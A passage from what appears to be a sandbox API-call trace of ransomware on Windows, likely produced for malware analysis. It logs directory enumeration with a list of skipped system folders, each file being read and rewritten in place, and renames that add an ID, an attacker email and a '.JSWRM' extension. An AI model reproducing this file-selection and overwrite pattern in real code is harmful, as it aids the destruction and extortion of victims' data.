[0089.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0089.332] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0089.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0089.332] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0089.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0089.332] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.332] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309664.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309664.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309664.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309664.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0089.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0089.333] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210910 | out: hHeap=0x1e0000) returned 1 [0089.333] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf406dcf, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf406dcf, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf42d018, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4ada, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0309705.JPG", cAlternateFileName="")) returned 1 [0089.333] lstrcmpiW (lpString1="J0309705.JPG", lpString2=".") returned 1 [0089.333] lstrcmpiW (lpString1="J0309705.JPG", lpString2="..") returned 1 [0089.333] lstrcmpiW (lpString1="J0309705.JPG", lpString2="...") returned 1 [0089.333] lstrcmpiW (lpString1="J0309705.JPG", lpString2="windows") returned -1 [0089.333] lstrcmpiW (lpString1="J0309705.JPG", lpString2="recovery") returned -1 [0089.333] lstrcmpiW (lpString1="J0309705.JPG", lpString2="perflogs") returned -1 [0089.333] lstrcmpiW (lpString1="J0309705.JPG", lpString2="documents and settings") returned 1 [0089.333] lstrcmpiW (lpString1="J0309705.JPG", lpString2="$RECYCLE.BIN") returned 1 [0089.333] lstrcmpiW (lpString1="J0309705.JPG", lpString2="system volume information") returned -1 [0089.333] lstrcmpiW (lpString1="J0309705.JPG", lpString2="msocache") returned -1 [0089.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0089.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309705.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309705.JPG", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309705.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0089.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0089.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309705.JPG", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309705.JPG", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309705.JPG", lpUsedDefaultChar=0x0) returned 12 [0089.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0089.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0089.334] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210288 | out: hHeap=0x1e0000) returned 1 [0089.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.334] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.334] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0089.334] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309705.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309705.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.339] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19162) returned 1 [0089.339] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.339] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4ad0) returned 0x24d210 [0089.340] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4ad0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4ad0, lpOverlapped=0x0) returned 1 [0089.343] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.343] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4ad0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4ad0, lpOverlapped=0x0) returned 1 [0089.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.343] CloseHandle (hObject=0x314) returned 1 [0089.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0089.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.343] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.343] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0089.343] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0089.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0089.344] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0089.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0089.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.344] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309705.JPG" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309705.jpg"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309705.JPG.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309705.jpg.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0089.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0089.344] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.344] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf406dcf, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1a00, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0309902.WMF", cAlternateFileName="")) returned 1 [0089.344] lstrcmpiW (lpString1="J0309902.WMF", lpString2=".") returned 1 [0089.344] lstrcmpiW (lpString1="J0309902.WMF", lpString2="..") returned 1 [0089.344] lstrcmpiW (lpString1="J0309902.WMF", lpString2="...") returned 1 [0089.345] lstrcmpiW (lpString1="J0309902.WMF", lpString2="windows") returned -1 [0089.345] lstrcmpiW (lpString1="J0309902.WMF", lpString2="recovery") returned -1 [0089.345] lstrcmpiW (lpString1="J0309902.WMF", lpString2="perflogs") returned -1 [0089.345] lstrcmpiW (lpString1="J0309902.WMF", lpString2="documents and settings") returned 1 [0089.345] lstrcmpiW (lpString1="J0309902.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.345] lstrcmpiW (lpString1="J0309902.WMF", lpString2="system volume information") returned -1 [0089.345] lstrcmpiW (lpString1="J0309902.WMF", lpString2="msocache") returned -1 [0089.345] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0089.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309902.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.345] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309902.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309902.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0089.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0089.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309902.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309902.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309902.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0089.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0089.349] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.349] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.349] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0089.349] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309902.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309902.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.350] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6656) returned 1 [0089.350] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.350] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1a00) returned 0x205850 [0089.350] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1a00, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1a00, lpOverlapped=0x0) returned 1 [0089.352] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.352] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1a00, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1a00, lpOverlapped=0x0) returned 1 [0089.352] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0089.352] CloseHandle (hObject=0x314) returned 1 [0089.352] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0089.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0089.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0089.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0089.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0089.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0089.353] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0089.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0089.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.353] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309902.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309902.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309902.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309902.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.353] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0089.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0089.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0089.354] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x20e4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0309904.WMF", cAlternateFileName="")) returned 1 [0089.354] lstrcmpiW (lpString1="J0309904.WMF", lpString2=".") returned 1 [0089.354] lstrcmpiW (lpString1="J0309904.WMF", lpString2="..") returned 1 [0089.354] lstrcmpiW (lpString1="J0309904.WMF", lpString2="...") returned 1 [0089.354] lstrcmpiW (lpString1="J0309904.WMF", lpString2="windows") returned -1 [0089.354] lstrcmpiW (lpString1="J0309904.WMF", lpString2="recovery") returned -1 [0089.354] lstrcmpiW (lpString1="J0309904.WMF", lpString2="perflogs") returned -1 [0089.354] lstrcmpiW (lpString1="J0309904.WMF", lpString2="documents and settings") returned 1 [0089.354] lstrcmpiW (lpString1="J0309904.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.354] lstrcmpiW (lpString1="J0309904.WMF", lpString2="system volume information") returned -1 [0089.354] lstrcmpiW (lpString1="J0309904.WMF", lpString2="msocache") returned -1 [0089.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0089.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309904.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309904.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309904.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0089.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0089.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309904.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0309904.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0309904.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0089.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.354] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0089.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.354] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.354] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0089.354] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309904.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309904.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.355] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8420) returned 1 [0089.355] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.355] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20e0) returned 0x205850 [0089.355] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x20e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x20e0, lpOverlapped=0x0) returned 1 [0089.357] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.357] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x20e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x20e0, lpOverlapped=0x0) returned 1 [0089.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0089.358] CloseHandle (hObject=0x314) returned 1 [0089.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0089.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0089.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0089.358] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0089.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0089.358] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0089.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0089.358] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0089.358] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309904.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309904.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0309904.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0309904.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0089.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0089.359] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0089.359] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf42d018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf42d018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf45328f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, 